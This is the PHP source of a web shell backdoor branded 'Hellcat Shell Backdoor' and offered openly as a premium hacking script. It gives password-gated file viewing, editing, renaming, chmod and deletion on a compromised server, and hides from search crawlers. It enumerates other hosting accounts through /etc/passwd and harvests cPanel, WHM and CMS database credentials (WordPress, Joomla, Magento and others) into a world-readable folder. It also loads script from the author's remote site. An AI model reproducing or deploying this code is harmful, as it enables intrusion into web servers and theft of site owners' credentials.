//-- Coded by Bartes Dwiky --//
//-- Premium Script Hellcat Shell Backdoor --//
//-- http://hellcatindonesia.net --//

//------------------[ readme ] ------------------//
// In accordance with the provisions and services ... we hope you enjoy this script, we have not made this script fully for paid members, for updates you will make a notification later ... Thanks! //

error_reporting(0);
ob_start("ob_gzhandler");
//-- FITUR RUBAH PASSWORD ADA DI DALAM SHELL --//
//$pass = "9c4a382e85f9492ce86d8fa71ee5c581"; // lol
$pass = "63a9f0ea7bb98050796b649e85481845"; // root
$_POST = cl($_POST);
$_GET = cl($_GET);
$_COOKIE = cl($_COOKIE);
$_COEG = array_merge($_POST, $_GET);
$_COEG = array_map("xp", $_COEG);
$cookie = md5($_SERVER['HTTP_USER_AGENT']);
if(!isset($_COOKIE['HELLCAT'])) {
vb('HELLCAT', $cookie);
}
function vb($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
function mtr($y) {
vars('<meta http-equiv="refresh" content="1;url='.$y.'"/>');
return $y;
}
function op($d, $e) {
$fp = fopen($d, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $e);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYhellcatR, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
function deledir($dirname) {
if (is_dir($dirname))
$dir_handle = opendir($dirname);
if (!$dir_handle)
return false;
while($file = readdir($dir_handle)) {
if ($file != "." && $file != "..") {
if (!is_dir($dirname."/".$file))
unlink($dirname."/".$file);
else
deledir($dirname.'/'.$file);
}
}
closedir($dir_handle);
rmdir($dirname);
return true;
}
function a($x17) {
@define("x13", "\x31\x33\x33\x37", true);
$x14 = base64_decode($x17);
$x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
$x19 = rtrim(
mcrypt_decrypt(
MCRYPT_RIJNDAEL_128,
hash('sha256', x13, true),
substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
return $x19;
}
function x($b) {
$c = a($b);
return $c;
}
function vars($x) {
echo $x;
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('html_errors',0);
@ini_set('max_execution_time',0);
@ini_set('file_uploads',1);
@set_time_limit(0);
@clearstatcache();
@define("x4", "https://www.hellcatindonesia.net", true);
@define("x5", "\x64\x69\x72\x3d", true);
@define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
@define("x6", "\x66\x69\x6c\x65\x3d", true);
@define("sec", $pass, true);
if(isset($_COEG['dir'])) {
$dir = str_replace("\\", "/", $_COEG['dir']);
@chdir($dir);
} else {
$dir = str_replace("\\", "/", getcwd());
}
$dir = str_replace("\\","/", $dir);
$scdir = explode("/", $dir);
function cl($arr){
$quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
if(is_array($arr)){
foreach($arr as $k=>$v){
if(is_array($v)) $arr[$k] = cl($v);
else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
}
}
}
return $arr;
}
function xp($str){
return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
}
function r($r) {
vars('<script>window.location = "'.$r.'";</script>');
return $r;
}
function s($s) {
echo 'notif({
type: "default",
msg: "<span class=\'alert\'><font color=\'#fff\'>'.$s.'</font>",
width: "all",
height: 100,
position: "center",
});';
return $s;
}
function error($text) {
echo '<script> notif({
type: "default",
msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
width: "all",
height: 100,
position: "center",
});</script>';
return $text;
}
function success($text) {
echo '<script> notif({
type: "default",
msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
width: "all",
height: 100,
position: "center",
});</script>';
return $text;
}
if(get_magic_quotes_gpc()) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_COEG = stripslashes_array($_COEG);
$_COOKIE = stripslashes_array($_COOKIE);
}
if(!empty(sec)) {
if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec)) vb('HELLCAT', sec);
if(!isset($_COOKIE['HELLCAT']) || ($_COOKIE['HELLCAT'] != sec))
login();
}
function login() {
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
//eval(str_rot13(gzinflate(str_rot13(base64_decode("RikuqywqKVdKsEgAseKBzPiCpMT0osT0NA2l0vT0cSt9/TLd3KTEIr2CJL2yUf3SosrKgrxn/cqkkrJR3TQQN9NVLz07XVbTmpersKxVUFYFdyhDBAA=")))));

<!DOCTYPE html>
<title>HellCat Indonesia - echo $_SERVER["REMOTE_ADDR"];

die('</title> <meta name="robots" content="noindex, nofollow, noarchive"> <meta name="viewport" content="width=device-width, initial-scale=1">
<meta property="og:type" content="article">
<meta name="description" content="version 1.0.">
<link rel="icon" type="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
<meta property="og:title" content="Hellcat Indonesia Shell Backdoor!">
<meta property="og:description" content="version 1.0."/>
<meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
<meta property="og:image:type" content="image/jpeg"/>
<meta property="og:image:width" content="300" />
<meta property="og:image:height" content="300" />
<meta property="fb:app_id" content="1784293148453056" />
<link href="http://aashirwadtravel.com/favicon.ico" rel="icon" type="image/x-icon"/>
<meta name="theme-color" content="#222"><meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#222"><meta name="msapplication-navbutton-color" content="#222"><meta name="author" content="Hellcat Indonesia">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
<style>
@import url("https://fonts.googleapis.com/css?family=Cabin");
*{
box-sizing: border-box;
}
*:focus {
outline: 0;
}
body {
font-size: 14px;
color:#fff;
margin:auto;
font-family: "Cabin";
background:#191919;
text-shadow:0px 0px 0px #343436;
}
.btn-exe {
background:#343436;
color:#fff;
font-family: "Cabin";
padding:6px;
border:1px solid #343436;
width:100%;
font-size:13px;
}
.login-container {
max-width: 450px;
margin: auto;
overflow: auto;
background:none;
}
.login-kepala {
background:#262624;
padding:10px;
color:#fff;
font-size:17px;
position:fixed;z-index:1024;top:0;left:0;right:0;
box-shadow:0px 0px 3px #111;
font-family: "Cabin";
}
input[type=password] {
border:1px solid #343436;
padding:8px;
background: #1D1D1D;
color:#fff;
font-family: "Cabin";
width:100%;
font-size:14px;
}
.btn-exe:hover {
background:none;
border:1px solid #343436;
-webkit-transition: all 0.3s;
-moz-transition: all 0.3s;
transition: all 0.3s;
}
table {
width: 100%;
}
@media screen and (max-width: 1024px) {
.btn-exe {
background:#343436;
color:#fff;
font-family: "Cabin";
padding:7px;
border:1px solid #343436;
width:100%;
font-size:13px;
}
}
@media screen and (max-width: 780px) {
.btn-exe {
background:#343436;
color:#fff;
font-family: "Cabin";
padding:7px;
border:1px solid #343436;
width:100%;
font-size:14px;
}
}
.posisi{
position: relative;
top: 100px;
}
</style>

<div class="login-kepala">
<div class="login-container"></div></div>

</div>

');
}

<!DOCTYPE HTML>
<html lang="id">
HellCat Indonesia - <?php echo $_SERVER["REMOTE_ADDR"]; ?><title>HellCat Indonesia - echo $_SERVER["REMOTE_ADDR"]; </title>
<script>
var bleep = new Audio();
bleep.src = 'https://s.cdpn.io/217233/buttonHoverScary.wav';
</script>

vars('
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<meta property="og:type" content="article">
<meta name="description" content="version 1.3">
<link rel="icon" type="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
<meta property="og:title" content="Hellcat Indonesia Shell Backdoor!">
<meta property="og:description" content="version 1.0."/>
<meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
<meta property="og:image:type" content="image/jpeg"/>
<meta property="og:image:width" content="300" />
<meta property="og:image:height" content="300" />
<meta property="fb:app_id" content="1784293148453056" />
<link href="http://aashirwadtravel.com/favicon.ico" rel="icon" type="image/x-icon"/>
<meta name="theme-color" content="#222">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#222">
<meta name="msapplication-navbutton-color" content="#222">
<meta name="author" content="HellCat Indonesia">

<style>
@import url("https://fonts.googleapis.com/css?family=Cabin");
*{
box-sizing: border-box;
}
*:focus {
outline: 0;
}
body {
font-size: 14px;
color:#fff;
margin:auto;
font-family: "Cabin";
background:#191919;
text-shadow:0px 0px 0px #343436;
}
::selection {
background-color: rgba(201,223,255,0.2);
color: #ffffff;
}
::-moz-selection {
background-color: rgba(201,223,255,0.1);
color: #ffffff;
}
hr {
border: 0;
height: 1px;
background-image: -webkit-linear-gradient(left, #343436, #343436, #343436);
background-image: -moz-linear-gradient(left, #343436, #343436, #343436);
background-image: -ms-linear-gradient(left, #343436, #343436, #343436);
background-image: -o-linear-gradient(left, #343436, #343436, #343436);
}
code {
font-family: "Cabin";
word-wrap: break-word;
background:none;
}
pre {
margin:0px;
border:1px solid #343436;
white-space: pre-wrap;
white-space: -moz-pre-wrap;
white-space: -pre-wrap;
white-space: -o-pre-wrap;
word-wrap: break-word;
}
.co {
margin:auto;
max-width:300px;
}
.a:hover {
color:#1D9D73;
-webkit-transition: all 0.3s;
-moz-transition: all 0.3s;
transition: all 0.3s;
}
.mainc {
color: #1D9D73;
}
.coL-option {
padding:5px;
border:1px solid #343436;
margin-top:5px;
background:none;
}
.coL-btn-option-active {
padding:5px;
background: #343436;
border:1px solid #343436;
font-size:16px;
font-family: "Cabin";
width:100%;
color:#fff;
}
.coL-btn-option {
padding:5px;
background: none;
border:1px solid #343436;
font-size:16px;
font-family: "Cabin";
width:100%;
color:#fff;
}
.coL-btn-option:hover {
background: #343436;
width:100%;
-webkit-transition: all 0.3s;
-moz-transition: all 0.3s;
transition: all 0.3s;
}
.coL-option-panel {
padding:5px;
border:none;
background:#343436;
}
th {
font-weight: normal;
font-size: 15px;
}
.btn-exe {
background:#343436;
color:#fff;
font-family: "Cabin";
padding:6px;
border:1px solid #343436;
width:100%;
font-size:13px;
}
textarea {
border: 1px solid #343436;
width: 100%;
height: 487px;
padding: 5px;
background: #1D1D1D;
color: #ffffff;
font-family: "Cabin";
font-size: 13px;
}
select {
cursor:pointer;
padding:6px;
border:1px solid #343436;
font-family: "Cabin";
font-size:14px;
background: #1D1D1D;
width:100%;
color: #fff;
-webkit-transition: all 0.5s;
-moz-transition: all 0.5s;
transition: all 0.5s;
}
.php {
font-size: 13px;
}
.td-md5 {
border-right:1px solid #1D9D73;
padding:6px;
}
.login-container {
max-width: 450px;
margin: auto;
overflow: hidden;
background:none;
}
.login-kepala {
background:#262624;
padding:10px;
color:#fff;
font-size:17px;
position:fixed;z-index:1024;top:0;left:0;right:0;
box-shadow:0px 0px 3px #111;
font-family: "Cabin";
}
.dir {
background:#1D1D1D;
padding:2px;
margin-left:2px;
margin-right:2px;
margin-top:3px;
margin-bottom:1px;
}
.dir-pallet {
background:#343436;
padding:6px;
text-align:left;
}
.dir-td-left {
width:50px;
border-right:1px solid #1D9D73;
font-size: 14px;
}
.dir-td-right {
padding-left:5px;
font-size: 15px;
}
.tools-content {
padding:3px;
margin-top:5px;
background:none;
border:1px solid #343436;
}
.td-tools-left {
padding:7px;
width:30px;
text-align:center;
}
.td-tools-icon {
width:50px;
background:none;
text-align:center;
}
.td-tools-content {
padding-left:5px;
}
.ex-hov:hover {
background:rgba(52, 52, 54, 0.3);
-webkit-transition: all 0.3s;
-moz-transition: all 0.3s;
transition: all 0.3s;
}
.kepala {
background:#343436;
padding:7px;
color:#fff;
font-size:15px;
position:fixed;z-index:1024;top:0;left:0;right:0;
box-shadow:0px 0px 3px #111;
font-family: "Cabin";
}
.co-ontainer {
max-width: 820px;
margin: auto;
overflow: hidden;
background:none;
}
.co-ontainer-2 {
max-width: 820px;
margin: auto;
overflow: hidden;
background:#232326;
margin-top:50px;
}
table {
width:100%;
}
.td-panel {
background: #343436;
padding:5px;
width:40px;
text-align:center;
}
.td-panel-right {
padding-left:3px;
font-size: 14px;
}
.wrap {
word-wrap: break-word;
}
.break {
word-break: break-all;
white-space: normal;
}
.btn-dark:hover {
color:#4B81AA;
}
.coL-panel {
padding:1px;
border:1px solid #343436;
color:#fff;
background:none;
}
.coR-panel {
padding:1px;
border:1px solid #343436;
color:#fff;
background:none;
}
.footer {
background:#343436;
color:#fff;
padding:8px;
text-align:center;
margin-top:2px;
}
.btn-nav {
background:rgba(0,0,0,0.3);
padding:6px;
color:#fff;
font-size:14px;
font-family: "Cabin";
width:100%;
border:none;
font-weight:normal;
}
.btn-nav:hover {
background:#343436;
-webkit-transition: all 0.3s;
-moz-transition: all 0.3s;
transition: all 0.3s;
}
.table-info {
margin-top:3px;
border-collapse:collapse;
font-family: "Cabin";
}
.th-info {
padding:6px;
border:1px solid #343436;
background:#343436;
border-collapse:collapse;
font-family: "Cabin";
}
.td-info {
padding:7px;
border:1px solid #343436;
background:none;
border-collapse:collapse;
font-family: "Cabin";
}
.table-file {
margin-top:3px;
border-collapse:collapse;
font-family: "Cabin";
}
.th-file {
padding:6px;
border:1px solid #343436;
background:#343436;
border-collapse:collapse;
font-family: "Cabin";
}
.td-file {
padding:4px;
border:1px solid #343436;
background:none;
border-collapse:collapse;
font-family: "Cabin";
}
.label-danger {
color:#FF0000;
}
.label-default {
color:#1D9D73;
}
.label-success {
color:#1D9D73;
}
.top {
margin-top:5px;
}
input[type=text] {
border:1px solid #343436;
padding:7px;
background: #1D1D1D;
color:#fff;
font-family: "Cabin";
width:100%;
font-size:14px;
}
input[type=password] {
border:1px solid #343436;
padding:8px;
background: #1D1D1D;
color:#fff;
font-family: "Cabin";
width:100%;
font-size:14px;
}
input[type=file] {
border:1px solid #343436;
color:trasparent;
background: #1D1D1D;
width:100%;
font-size:12px;
padding:4px;
font-family: "Cabin";
}
.alert {
font-family: "Cabin";
}
.btn-exe:hover {
background:none;
border:1px solid #343436;
-webkit-transition: all 0.3s;
-moz-transition: all 0.3s;
transition: all 0.3s;
}
.nav {
background: #303030;
color:#fff;
width:30px;
height:30px;
padding:5px;
border:none;
border-radius:100%;
box-shadow: 2px 2px 2px rgba(0,0,0,0.3) inset;
}
.nav:hover {
background: #1D9D73;
transition: all 0.5s ease-in-out;
color: #fff;
}
/* Main */

background-size:100% 125%;
padding-top:250px;
padding-bottom:5px;
padding-left:5px;
padding-right:5px;
border:0px solid #1D1D1D;
}
.coL {
width: 469px;
border: 0px solid #343436;
background: #1D1D1D;
padding: 5px;
float: left;
margin-left:2px;
margin-right:2px;
margin-bottom:2px;
margin-top:3px;
color:white;
}
.coR {
width: 343px;
border: 0px solid #343436;
background: #1D1D1D;
margin-left:2px;
margin-right:2px;
margin-bottom:2px;
margin-top:3px;
padding: 5px;
float: left;
}
a {
text-decoration:none;
color:#fff;
}
.cookie-td {
width: 150px;
}

@media screen and (max-width: 1024px) {

.co-ontainer-2 {
width: 100%;
}
.coL {
width: 467px;
background: none:
border: none;
margin-bottom:3px;
}
.coR {
width: 42%;
float: right;
}
.cookie-td {
width: 150px;
}
.btn-exe {
background:#343436;
color:#fff;
font-family: "Cabin";
padding:7px;
border:1px solid #343436;
width:100%;
font-size:13px;
}
input[type=file] {
border:1px solid #343436;
color:trasparent;
background: #1D1D1D;
width:100%;
font-size:12px;
padding:4px;
font-family: "Cabin";
}
}
@media screen and (max-width: 780px) {

background-size:100% 100%;
padding-top:160px;
padding-bottom:5px;
padding-left:5px;
padding-right:5px;
margin:3px;
}
.coL {
width: auto;
float: none;
}
.coR {
width: auto;
float: none;
}
.cookie-td {
width: 100px;
}
.btn-exe {
background:#343436;
color:#fff;
font-family: "Cabin";
padding:7px;
border:1px solid #343436;
width:100%;
font-size:14px;
}
input[type=file] {
border:1px solid #343436;
color:trasparent;
background: #1D1D1D;
width:100%;
font-size:12px;
padding:6px;
font-family: "Cabin";
}
}
.hljs{display:block;overflow-x:auto;padding:0.5em;background:#1D1D1D;color:#e6e1dc}
.hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}
.hljs-keyword,.hljs-selector-tag{color:#c26230}
.hljs-string,.hljs-number,.hljs-regexp,.hljs-variable,.hljs-template-variable{color:#a5c261}
.hljs-subst{color:#519f50}.hljs-tag,.hljs-name{color:#e8bf6a}
.hljs-type{color:#da4939}
.hljs-symbol,.hljs-bullet,.hljs-built_in,.hljs-builtin-name,.hljs-attr,.hljs-link{color:#6d9cbe}
.hljs-params{color:#d0d0ff}
.hljs-attribute{color:#cda869}
.hljs-meta{color:#9b859d}
.hljs-title,.hljs-section{color:#ffc66d}
.hljs-addition{background-color:#144212;color:#e6e1dc;display:inline-block;width:100%}
.hljs-deletion{background-color:#600;color:#e6e1dc;display:inline-block;width:100%}
.hljs-selector-class{color:#9b703f}
.hljs-selector-id{color:#8b98ab}
.hljs-emphasis{font-style:italic}
.hljs-strong{font-weight:bold}
.hljs-link{text-decoration:underline}
#ui_notifIt{
position: fixed;
top: 10px;
right: 10px;
left:10px;
cursor: pointer;
overflow: hidden;
-webkit-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
-moz-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
-o-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
-wekbit-border-radius: 5px;
-moz-border-radius: 5px;
-o-border-radius: 5px;
border-radius: 5px;
z-index: 2000;
}
#ui_notifIt:hover{
opacity: 1 !important;
}
#ui_notifIt p{
text-align: center;
font-family: sans-serif;
font-size: 14px;
padding: 0;
margin: 0;
}
#notifIt_close{
position: absolute;
color: #FFF;
top: 0;
padding: 0px 5px;
right: 0;
}
#notifIt_close:hover {
background-color: rgba(255, 255, 255, 0.3);
}
#ui_notifIt.default{
background: #242424;
border:0px solid #091835;
box-shadow:0px 2px 4px rgba(0,0,0,0.4);
}

/* notifit confirm */
.notifit_confirm_bg,
.notifit_prompt_bg{
position: fixed;
top: 0;
left: 0;
height: 100%;
width: 100%;
background-color: rgba(255, 255, 255, 0.1);
}
.notifit_confirm *,
.notifit_prompt *{
font-family: sans-serif;
}
.notifit_confirm,
.notifit_prompt{
position: fixed;
top: 0;
left: 0;
padding: 30px 30px 0px 30px;
background-color: #eee;
border: 1px solid rgba(0, 0, 0, 0.1);
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
-ms-border-radius: 5px;
-o-border-radius: 5px;
border-radius: 5px;
-webkit-box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
}
option {
-webkit-transition: all 0.5s;
-moz-transition: all 0.5s;
transition: all 0.5s;
}
.move-top {
position: fixed;
bottom: 10px;
right: 10px;
text-decoration: none;
padding: 10px;
display: none;
cursor:pointer;
background:rgba(0, 0, 0, 0.2);
border-radius:5px;
} </style>
<link rel="icon" href="/image/favicon.ico" type="image/x-icon" />
<script>
baseUrl = window.location.href.split("?")[0];
window.history.pushState("name", "?", baseUrl);
function c(x) {
window.location = x
}
</script>
<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
<script src="'.x4.'alert.js"></script>
<style>
.move-top {
position: fixed;
bottom: 10px;
right: 10px;
text-decoration: none;
padding: 10px;
display: none;
cursor:pointer;
background:rgba(0, 0, 0, 0.2);
border-radius:5px;
}</style>
<i class="fa fa-chevron-up move-top"></i>
<script>
jQuery(document).ready(function() {
var offset = 220;
var duration = 500;
jQuery(window).scroll(function() {
if (jQuery(this).scrollTop() > offset) {
jQuery(\'.move-top\').fadeIn(duration);
} else {
jQuery(\'.move-top\').fadeOut(duration);
}
});
jQuery(\'.move-top\').click(function(event) {
event.preventDefault();
jQuery(\'html, body\').animate({scrollTop: 0}, duration);
return false;
})
});
</script>
<script>hljs.initHighlightingOnLoad();</script><div class="kepala"><div class="co-ontainer">
<td style="width:25px">
<i class="fa fa-superpowers"></i><td style="text-align:right;width:100px">
<button onmousedown="bleep.play();" class="nav" onclick=\'c("'.$_SERVER['PHP_SELF'].'")\'><i class="fa fa-home"></i></button>
<button onmousedown="bleep.play();" class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'about")\'><i class="fa fa-question"></i></button>
<button onmousedown="bleep.play();" class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'logout")\'><i class="fa fa-power-off"></i></button>

HELLCAT INDONESIA

</div></div>

<div class="co-ontainer-2">
<div class="cover"></div>
<div class="dir">
<table style="width:100%">
<td style="width:100%"><div class="dir-pallet"><td class="dir-td-left"><i class="fa fa-bandcamp"></i><td class="dir-td-right break">');
foreach($scdir as $c_dir => $cdir) {
echo "<a class='a' onclick=\"c('?dir=";
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];
if($i != $c_dir) {
echo "/";
}
}
echo "')\">$cdir</a>/";
}
vars('

</div></th></div>');
$filez = basename($_COEG['file']);
$size = filesize("$dir/$filez")/1024;
$size = round($size,3);
if($size > 1024) {
$size = round($size/1024,2). ' MB';
} else {
$size = $size. ' KB';
}
vars('<div class="coL">');
if($_COEG['command'] == 'logout') {
r($_SERVER['PHP_SELF']);
setcookie('HELLCAT', time() - 3600);
}

// --- View Source --- //
elseif($_COEG['command'] == 'view') {
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">SOURCE VIEWER

</div>';
echo '<div class="coL-option">';
echo '<td align="center" style="width:30px"><i class="fa fa-file-o"></i> <td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font><td style="width:90px" class="coL-option-panel" align="center">'.$size.'

</div>";
$source = htmlspecialchars(@file_get_contents($_COEG['file']));
if(empty($source)) {
error('Source Not Found !!');
echo x9;
} else {
echo "<pre class='top'><code class='php'>".$source."</code></pre>";
}
}

elseif($_COEG['command'] == 'edit') {
if($_COEG['save']) {
$save = file_put_contents($_COEG['file'], $_COEG['src']);
if($save) {
success('Source Saved !!');
} else {
error('Permission Denied !!');
}
}
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">EDIT FILE

</div>';
echo '<div class="coL-option">
<td align="center" style="width:30px"><i class="fa fa-file-o"></i> <td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font><td style="width:90px" class="coL-option-panel" align="center">'.$size.'

</div>";
$source = htmlspecialchars(@file_get_contents($_COEG['file']));
if(empty($source)) {
echo "";
} else { echo "";
}
}

elseif($_COEG['command'] == 'rename') {
if($_COEG['rename']) {
$rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
if($rename) {
success('File Renamed !!');
mtr("?".x7."rename&".x5.$dir."&".x6.$dir."/".$_COEG["rename"]);
} else {
error('Permission Denied !!');
}
}
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">RENAME FILE

</div>';
echo '<div class="coL-option"><td align="center" style="width:30px"><i class="fa fa-file-o"></i> <td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font><td style="width:90px" class="coL-option-panel" align="center">'.$size.'

</div>";
echo "<div class='coL-option top'>

<i class='fa fa-file-o fa-3x'></i>

";
echo "</div>";
}

else if($_COEG['command'] == 'chmod') {
if(isset($_COEG['perm'])) {
if(chmod($_COEG['file'],octdec($_COEG['perm']))) {
success('Chmod Ok !!');
mtr("?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']);
} else {
error('Permission Denied !!');
}
}
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">CHMOD FILE

</div>';
echo '<div class="coL-option"><td align="center" style="width:30px"><i class="fa fa-file-o"></i> <td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font><td style="width:90px" class="coL-option-panel" align="center">'.$size.'

</div>";
echo "<div class='coL-option top'>

<i class='fa fa-file-o fa-3x'></i>

";
echo "</div>";
}

elseif($_COEG['command'] == 'delete') {
$delete = unlink($_COEG['file']);
if($delete) {
vars('<script>c("?'.x5.$dir.'");</script>');
} else {
error('Permission Denied !!');
}
}

elseif($_COEG['command'] == 'jumping') {
echo '<div class="coL-panel">
<td class="td-panel"><i class="fa fa-bug"></i><td class="td-panel-right">JUMPING SERVER

</div>';
$i = 0;
$s_a = fopen("/etc/passwd", "r");
while($s_b = fgets($s_a)) {
if($s_b == '' || !$s_a) {
error("Can't Read [ /etc/passwd ]");
mtr("?".x5.$dir);
echo x9;
} else {
preg_match_all('/(.*?):x:/', $s_b, $s_c);
foreach($s_c[1] as $s_d) {
$s_e = "/home/$s_d/public_html";
if(is_readable($s_e)) {
$i++;
$s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-file'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> <a href='?dir=$s_e'>[ $s_d ]</a>";
if(is_writable($s_e)) {
$s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-info'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'>
<a href='?dir=$s_e'><font color='red'>[ $s_d ]</font></a>";
}
echo $s_o;
$s_k = file_get_contents("/etc/named.conf");
if($s_k == '') {
success('Server Not Found !!');
mtr("?".x5.$dir);
echo x9;
} else {
preg_match_all("#/var/named/(.*?).db#", $s_k, $s_v);
foreach($s_v[1] as $s_x) {
$s_g = posix_getpwuid(@fileowner("/etc/valiases/$s_x"));
$s_g = $s_g['name'];
if($s_g == $s_d) {
echo "<td class='td-info'><a href='http://$s_x'>http://$s_x</a> "; break;}}}}}}}
if($i == 0) {
error('Server Not Found !!');
mtr("?".x5.$dir);
echo x9;
} else {
echo "<div class='coL-option top'>Total : <span class='label label-default'> ".$i." <span></div>";
}
}

elseif($_COEG['command'] == 'config') {
$s_t = fopen("/etc/passwd", "r");
$s_z = mkdir("hellcatindonesia", 0777);
$s_s = "Options all\
Require None\
Satisfy Any";
$s_d = fopen("hellcatindonesia/.htaccess","w");
fwrite($s_d, $s_s);
while($s_q = fgets($s_t)) {
if($s_q == "" || !$s_t) {
error('Can\'t Read etc/passwd !!');
} else {
preg_match_all('/(.*?):x:/', $s_q, $s_y);
foreach($s_y[1] as $s_p) {
$s_k = "/home/$s_p/public_html/";
if(is_readable($s_k)) {
$s_g = array(
"/home/$s_p/.my.cnf" => "cpanel",
"/home/$s_p/.accesshash" => "WHM-accesshash",
"/home/$s_p/public_html/bw-configs/config.ini" => "BosWeb",
"/home/$s_p/public_html/config/koneksi.php" => "Lokomedia",
"/home/$s_p/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
"/home/$s_p/public_html/clientarea/configuration.php" => "WHMCS",
"/home/$s_p/public_html/whm/configuration.php" => "WHMCS",
"/home/$s_p/public_html/whmcs/configuration.php" => "WHMCS",
"/home/$s_p/public_html/forum/config.php" => "phpBB",
"/home/$s_p/public_html/sites/default/settings.php" => "Drupal",
"/home/$s_p/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$s_p/public_html/app/etc/local.xml" => "Magento",
"/home/$s_p/public_html/joomla/configuration.php" => "Joomla",
"/home/$s_p/public_html/configuration.php" => "Joomla",
"/home/$s_p/public_html/wp/wp-config.php" => "WordPress",
"/home/$s_p/public_html/wordpress/wp-config.php" => "WordPress",
"/home/$s_p/public_html/wp-config.php" => "WordPress",
"/home/$s_p/public_html/admin/config.php" => "OpenCart",
"/home/$s_p/public_html/slconfig.php" => "Sitelok",
"/home/$s_p/public_html/application/config/database.php" => "Ellislab");
foreach($s_g as $s_h => $s_l) {
$s_r = file_get_contents($s_h);
if($s_r == '') {
} else {
$fcS = fopen("hellcatindonesia/$s_p-$s_l.txt","w");
fputs($fcS,$s_r);
}}}}}}
success('OK !!');
